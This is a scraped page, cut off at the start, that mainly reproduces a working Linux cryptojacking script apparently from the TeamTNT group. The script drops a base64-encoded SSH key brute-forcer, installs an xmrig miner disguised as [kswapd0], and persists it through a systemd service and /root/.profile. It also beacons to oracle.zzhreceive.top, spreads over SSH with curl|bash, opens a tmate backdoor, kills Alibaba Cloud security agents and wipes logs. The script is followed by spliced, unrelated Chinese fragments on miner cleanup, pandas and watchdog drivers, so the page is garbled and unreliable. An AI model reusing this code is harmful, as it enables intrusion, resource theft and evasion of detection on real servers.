tLT1bIFwwMzNbOTNtaHR0cHM6Ly94ZmlsdHJhdGVkLmNvbVwwMzNbOTJtCiAgICAgICAgXG5cMDMzWzBtIiIiKQoKCglwYXJzZXIgPSBhcmdwYXJzZS5Bcmd1bWVudFBhcnNlcigpCglwYXJzZXIuYWRkX2FyZ3VtZW50KCctLWhvbWUnLCBoZWxwPSdjdXN0b20gaG9tZSBwYXRoJyxkZWZhdWx0PSIvaG9tZS8iKQoJcGFyc2VyLmFkZF9hcmd1bWVudCgnLS1ydW4nLCctcicsIGhlbHA9J3J1biBjb21tYW5kcyBvbiBjb21wcm9taXNlZCBob3N0cycsZGVmYXVsdD0iIikKCXBhcnNlci5hZGRfYXJndW1lbnQoJy0tbm8tcGFzc3dkJywgZGVzdD0ncGFzc3dkJywgYWN0aW9uPSdzdG9yZV9mYWxzZScsIGRlZmF1bHQ9VHJ1ZSwgaGVscD0nc2tpcCBwYXNzd2QgY2hlY2snKQoJcGFyc2VyLmFkZF9hcmd1bWVudCgnLS1jcmFjaycsJy1jJywgaGVscD0nY3JhY2sgaGFzaGVkIGtub3duX2hvc3RzIGZpbGVzJyxkZWZhdWx0PSIiLG1ldGF2YXI9J3N1Ym5ldCcpCglwYXJzZXIuYWRkX2FyZ3VtZW50KCctLXRocmVhZHMnLCctdCcsIHR5cGU9aW50LCBoZWxwPSdicnV0ZS1mb2NpbmcgdGhyZWFkcycsZGVmYXVsdD00KQoJYXJncyA9IHBhcnNlci5wYXJzZV9hcmdzKCkKCglzeXMuc3Rkb3V0LndyaXRlICgiXDAzM1s5Mm1bKl1cMDMzWzBtIGVudW1lcmF0aW5nIHZhbGlkIHVzZXJzIHdpdGggc3NoIGtleXMuLi5cbiIpCglkaXNjb3ZlcnkoYXJncykKCXN5cy5zdGRvdXQud3JpdGUgKCJcMDMzWzkybVsqXVwwMzNbMG0gRG9uZS5cbiIpCgoJaWYgbGVuKHNzaEtleXMpIDw9IDA6CgkJc3lzLnN0ZG91dC53cml0ZSAoIlwwMzNbOTNtWyFdXDAzM1swbSBObyB2YWxpZCBTU0gga2V5cyBmb3VuZCBvbiB0aGUgc3lzdGVtLlxuIikKCQlzeXMuZXhpdCgpCgllbHNlOgoJCXN5cy5zdGRvdXQud3JpdGUgKCJcMDMzWzkybVsqXVwwMzNbMG0gU1NIIGtleXMgZm91bmQ6XG5cMDMzWzkybVxuIikKCgkJZm9yIGtleSBpbiBzc2hLZXlzOgoJCQlzeXMuc3Rkb3V0LndyaXRlICgiXHQiICsga2V5ICsgIlxuIikKCglpZiBsZW4odXNlcnMpIDw9IDA6CgkJc3lzLnN0ZG91dC53cml0ZSAoIlxuXDAzM1s5M21bIV1cMDMzWzBtIE5vIHZhbGlkIHVzZXJzIGZvdW5kIG9uIHRoZSBzeXN0ZW0uXG4iKQoJCXN5cy5leGl0KCkKCWVsc2U6CgkJc3lzLnN0ZG91dC53cml0ZSAoIlxuXDAzM1s5Mm1bKl1cMDMzWzBtIFVzZXJzIGZvdW5kOlxuXDAzM1s5Mm1cbiIpCgoJCWZvciB1c2VyIGluIHVzZXJzOgoJCQlzeXMuc3Rkb3V0LndyaXRlICgiXHQiICsgdXNlciArICJcbiIgKSMrICIgOjogIiArIHRhcmdldHNbdXNlcl0KCglpZiBsZW4oa25vd25Ib3N0cykgPD0gMDoKCQlzeXMuc3Rkb3V0LndyaXRlICgiXG5cMDMzWzkzbVshXVwwMzNbMG0gTm8gdmFsaWQga25vd24gaG9zdHMgZm91bmQgb24gdGhlIHN5c3RlbS5cbiIpCgkJc3lzLmV4aXQoKQoKCWVsc2U6CgkJc3lzLnN0ZG91dC53cml0ZSAoIlxuXDAzM1s5Mm1bKl1cMDMzWzBtIGtub3duIGhvc3RzIGZvdW5kOlxuXDAzM1s5Mm1cbiIpCgoJCWZvciBob3N0IGluIGtub3duSG9zdHM6CgkJCXN5cy5zdGRvdXQud3JpdGUgKCJcdCIrIGhvc3QrICJcbiIpCgoJc3lzLnN0ZG91dC53cml0ZSAoIlxuXDAzM1s5Mm1bKl1cMDMzWzBtIFN0YXJ0aW5nIGtleXMgYnJ1dGVmb3JjaW5nLi4uXG4iKQoJQXR0YWNrID0gYXR0YWNrKGFyZ3MucnVuLCBhcmdzLnRocmVhZHMpCgoJQXR0YWNrLnJ1bigpCglzeXMuc3Rkb3V0LndyaXRlICgiXDAzM1s5Mm1bKl1cMDMzWzBtIEF0dGFjayBDb21wbGV0ZSFcbiIpCgoKCgkJCgo=' | base64 -d > /usr/bin/pu; chmod +x /usr/bin/pu
function checksshkeys(){
if [ -f /var/tmp/.copydie/[kswapd0].log ]; then
curl http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
curl http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
cat /home/hilde/.ssh/authorized_keys|grep root@puppetserver >/dev/null
if (test $? -ne 0); then
curl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
curl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cat /root/.ssh/authorized_keys|grep root@puppetserver >/dev/null
if (test $? -ne 0); then
curl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
curl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
function SetupMoneroOcean(){
function SetupMoneroOcean1(){
# printing intentions
echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
[ -d $MOHOME/ ] || mkdir $MOHOME/
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then
echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
chmod +x $MOHOME/\[kswapd0\]
rm /tmp/xmrig.tar.gz
echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[kswapd0] ]; then
echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
echo "[*] Looking for the latest version of Monero miner"
#LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'`
LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK
echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then
echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
rm /tmp/xmrig.tar.gz
chmod +x $MOHOME/\[kswapd0\]
echo "[*] Checking if stock version is OKAY!"
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[kswapd0] ]; then
echo "ERROR: Stock version of $MOHOME/[kswapd0] is not functional too"
echo "ERROR: Stock version of $MOHOME/[kswapd0] was removed by antivirus too"
echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
echo "[*] $MOHOME/[kswapd0] is OK"
######################### printing greetings ###########################
clear
echo -e " "
echo -e " \e[1;34;49m___________ _____________________________\033[0m"
echo -e " \e[1;34;49m\__ ___/___ _____ ____\__ ___/\ \__ ___/\033[0m"
echo -e " \e[1;34;49m | |_/ __ \\__ \ / \| | / | \| | \033[0m"
echo -e " \e[1;34;49m | |\ ___/ / __ \| Y Y \ | / | \ | \033[0m"
echo -e " \e[1;34;49m |____| \___ >____ /__|_| /____| \____|__ /____| \033[0m"
echo -e " \e[1;34;49m \/ \/ \/ \/ \033[0m"
echo -e " "
echo -e " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "
echo -e " "
echo -e " \e[1;34;49m Now you get, what i want to give... --- ''' \033[0m"
echo " "
echo " "
if [ "$(id -u)" == "0" ]; then
echo "running as root... its all OKAY!"
echo "running not as root... first starting tmp setup..."
# checking prerequisites
if [ -z $WALLET ]; then
echo "ERROR: wallet"
WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 ]; then
echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"
if [ -z $MOHOME ]; then
echo "ERROR: Please define HOME environment variable to your home directory"
if [ ! -d $MOHOME ]; then
echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"
echo ' export HOME=
'
if ! type curl >/dev/null; then
apt-get update --fix-missing 2>/dev/null 1>/dev/null
apt-get install -y curl 2>/dev/null 1>/dev/null
apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
yum install -y curl 2>/dev/null 1>/dev/null
yum reinstall -y curl 2>/dev/null 1>/dev/null
sleep 2
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
SetupMoneroOcean1
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
if [ -f "$MOHOME/[kswapd0].pid" ]
echo "config file exists, neednot backup"
echo "config file not exists.download from teamtnt"
SetupMoneroOcean1
if [ -f "$MOHOME/[kswapd0]" ]
echo "miner file exists"
curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig $MOHOME/\[kswapd0\]
if [ -f "$MOHOME/[kswapd0].pid" ]
echo "miner config exists"
curl -L --progress-bar $config_url -o $MOHOME/\[kswapd0\].pid
rm /tmp/xmrig.tar.gz
if [ -f "$MOHOME/[kswapd0]" ]
echo "miner file exists, neednot backup"
curl -L --progress-bar $miner_url_backup -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[kswapd0\]
rm /tmp/cf.tar
sed -i '0,/url/{s/"url": *"[^"]*",/"url": "elastic.zzhreceive.top:1414",/}' $MOHOME/[kswapd0].pid
sed -i ':a;N;$!ba;s/"url": *"[^"]*",/"url": "oracle.zzhreceive.top:1414",/2' $MOHOME/[kswapd0].pid
sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[kswapd0].pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 50,/' $MOHOME/[kswapd0].pid
sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[kswapd0].log'",#' $MOHOME/[kswapd0].pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[kswapd0].pid
cp $MOHOME/[kswapd0].pid $MOHOME/config_background.json
sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json
# preparing script
echo "[*] Creating $MOHOME/[kswapd0].sh script"
cat >$MOHOME/[kswapd0].sh </dev/null; then
nice $MOHOME/[kswapd0] \$*
echo "Monero miner is already running in the background. Refusing to run another one."
echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
chmod +x $MOHOME/[kswapd0].sh
# preparing script background work and work under reboot
if ! sudo -n true 2>/dev/null; then
if ! grep $MOHOME/[kswapd0].sh /root/.profile >/dev/null; then
echo "[*] Adding $MOHOME/[kswapd0].sh script to /root/.profile"
echo "$MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1" >>/root/.profile
echo "Looks like $MOHOME/[kswapd0].sh script is already in the /root/.profile"
echo "[*] Running kswapd0 service in the background (see logs in $MOHOME/[kswapd0].log file)"
/bin/bash $MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
echo "[*] Enabling huge pages"
echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
if ! type systemctl >/dev/null; then
/bin/bash $MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
echo "[*] Creating kswapd0 systemd service"
chmod +x /usr/bin/systemctl
cat >/tmp/kswapd0.service </dev/null
sudo systemctl daemon-reload
sudo systemctl enable kswapd0.service
sudo systemctl start kswapd0.service
localgo() {
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
clmo() {
if ps aux | grep -i '[a]liyun'; then
echo "this is ali cloud"
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
until [ "$number" -eq 0 ]; do
systemctl stop aliyun
systemctl stop aegis
ps -ef|grep -i aegis|awk '{print $2}'|xargs kill -HUP
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
while [ -d /usr/local/aegis ]
ps -ef|grep -i AliSecGuard|grep -v grep |awk '{print $2}'|xargs kill -HUP
path=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}')
num=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}'|wc -l)
if [ $num -gt 0 ]
echo "$path" exist
$path --stopdriver
echo "no AliSecGuard process"
rm -rf /usr/local/aegis
echo "it's not ali cloud"
tmt() {
mkdir -p /var/tmp/ 2>/dev/null
chattr -ia / /var/ /var/tmp/ 2>/dev/null
pkill tmate 2>/dev/null
if [ ! -f "/tmp/tmate" ]; then wget http://58.226.35.74/tmate -O /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then curl http://58.226.35.74/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then cd1 http://58.226.35.74/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then wd1 http://58.226.35.74/tmate -o /tmp/tmate; fi
chmod +x /tmp/tmate
URLTOKEN=$(awk 'BEGIN{srand();print rand()*1000000}')"O"$RANDOM
/tmp/tmate -F -k tmk-4ST6GRXU6GPUjlXHfSlNe0ZaT2 -n $URLTOKEN >/tmp/.tmbd &
curl http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wget http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
cd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
KILLMININGSERVICES
SetupMoneroOcean
makesshaxx
checksshkeys
SecureTheSystem
FixTheSystem
if [ ! -f "/var/tmp/.alsp" ]; then
localgo
echo 'lockfile' > /var/tmp/.alsp
tntrecht +i /var/tmp/.alsp || chattr +i /var/tmp/.alsp
echo "replay .. i know this server ..."
echo ""
echo "[*] Setup complete"
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
history -c
## now the bad part of the script###
从他的脚本中可以看出,这里会清除邮件和定时任务,想让大家不容易发觉,他的操作是在每次执行定时任务后删除定时任务列表
这个是他脚本里面的,他说: Now you get, what i want to give...
1. 切断来源
一般被侵入的话,服务器上的计划任务会被修改,会有一个进程一直在检测程序是否存在,如果只kill进程删除文件的话会发现过不了一会就会死灰复燃,所以斩草除根,先把去外界不安全的连接关掉。 被修改的计划任务如curl -o /tmp/kinsing http://45.137.155.5.
Step. 测试连接:
Step. 测试监控:,键入
Step. 查看宿主机数据目录:,发现挂载成功Step.查看redis数据 + log + pid文件存储的默认目录dir:,结果若不是 /data,则设置一下:
1)可以设置redis密码:,下次连接redis客户端,需经
文章目录一、Pandas文件读取1.pandas数据读取1、读取纯文本文件1.1 读取csv,使用默认的标题行、逗号分隔符1.2 读取txt文件,自己指定分隔符、列名2、读取excel文件3、读取sql文件二、pandas的数据结构DataFrame和SeriesDataFrame:二维数据,整个表格,多行多列1.Series1.1 仅有数据列表即可生产最简单的Series1.2 创建一个具有标签...
目录重链剖分概念预处理①DFS1()②DFS2()修改查询操作①对于任意两节点间的路径上所有节点修改 *O(logn)^2*查询 *O(logn)^2*②对于以任意节点为根的子树修改 *O(logn)*查询 *O(logn)*数据结构完整代码(无注释)
树链剖分可将树划分成若干条不相交的链的形式,每条链都是自底向上的。
重链剖分能保证划分出的每条重链与轻链上的节点 DFS 序连续,并以此作为节点的序号,每颗子树中的所有节点序号在[a,a+size]范围内(子树根节点序号为a,子树大小为siz
2022
年
06 月 27 日,OSCS 监测发现 PyPI 官方仓库被 ivanpoopoo 上传了 arduino、beautfulsoup、randam、pilloe、pilow、selemium 等恶意组件包。引用这些恶意组件包后会在用户电脑上下载脚本进行挖矿,该事件较为,OSCS 官方提醒广大开发者关注。PIP 是 Python 包管理工具,提供了对第三方 Python 包的查找、下载、安装、卸载等功能。攻击者 ivanpoopoo 通过模仿 pillow, selenium 等软件包进行钓鱼.
1.查看进程# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'找出CPU占有率高的你不认识的进程,我的是这样的bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa干掉它kill -9 111102.全局搜索这个进程[root@wangtianze ~]#
Linux
自带了一个
watchdog
的实现,用于监视系统的运行,包括一个内核
watchdog
module 和一个用户空间的
watchdog
程序。内核
watchdog
模块通过 /
dev
/
watchdog
这个字符设备与用户空间通信。用户空间程序一旦打开 /
dev
/
watchdog
设备(俗称“开门放狗”),就会导致在内核中启动一个1分钟的定时器(系统默认时间),此后,用户空间程序需
发现密码已经错误
# top
自己玩的。然后服务器被挖矿被封了,钱倒是退了,可再也买不到这么便宜的服务起了。因为是刚弄的一台16G服务器,才部署2个项目运行几天一切正常。再次部署多实例时发现,已部署好的服务老是掉,项目日志一切正常,感觉不太正常。去查看 隐藏权限中会多了ai权限 ,它修改了很多文件权限。最后还是CPU100%的问题只能重启服务器,再看就好了。
看门狗在嵌入式系统开发中占据重要的地位,管理系统的工作状态。在这里本人muge0913在参考别人的基础上,实现了mini6410看门狗的移植。本文章仅供技术交流请勿商用,转载请标明地址:
http://blog.csdn.net/muge0913/article/details/7063001
在mini6410中看门狗驱动文件为
linux
2.6.38/drivers/...
二、问题的解决过程
我对这些报警都没太在意,直到有天我登录宝塔界面,发现登录的过程非常的卡顿,用xshell连接服务器(包括敲命令行)非常卡顿,这时候我才逐渐 重视这个问题。
通过执行top命令以及宝塔页面的数据显示可以看出cpu资源被占的满满的:
下面我将详细说说我的解决步骤:
①因为考虑到我低配置的服务器运行了es,redis等服务,我觉得可能是因为配置太低导致了cpu负载超标,于是我重启了服务器。但发现重启后依旧是cpu占用打满。
us=$(id)
curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/
dev
/null
ulimit -n 65535
export MOHOME=/usr/share
mkdir $MOHOME -p
if [ -f "$MOHOME/[
产品详情元件型号国家/地区供应商种类总数E27-0-20101AL001US2290E27-0-20101AL001CA1157其他元器件国家/地区供应商种类总数E27-0-21151AL011566270E27-0-21251AE211233168E2702AXF233817E27-0-20151AL01122221E27-0-20051AL011122160E27-0-21101AL00122...
关于/tmp目录的清理规则SamRHEL6tmpwatch命令tmpwatch 是专门用于解决“删除 xxx天没有被访问/修改过的文件”这样需求的命令。安装:[root@sam01 ~]# yum install tmpwatch.x86_64使用:man tmpwatch
tmpwatch - removes files which haven't been accessed for a ...
4.查找find / -name xmrig 文件,或者程序信息 ps -aux | grep xmrig,找到安装目录并将其删除 rm -rf /root/5.删除定时任务 rm -rf /var/spool/cron。6.删除ssh认证信息 rm -rf ./ssh/8.尽量使用内网链接,不要暴露端口号或者外网地址。1.通过top发现xmrig占用了大量cpu。3.尝试直接kill发现杀死之后又会自动重启。7.原因,有可能是redis等程序导致,2.通过网上搜索发现是挖矿木马。
前一段时间我处理了一次应急响应,我还输出了一篇文章
Linux
应急响应笔记。这两天又处理了一次病毒入侵,在前一次的基础上,这次应急做了一些自动化脚本,应急响应效率有了一定程度的提升,故另做一份笔记。PS:本文重在分享应急响应经验,文中保留了恶意网址,但是删除了恶意脚
今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。
查了一下告警信息,如下:
该告警由如下引擎检测发现:...
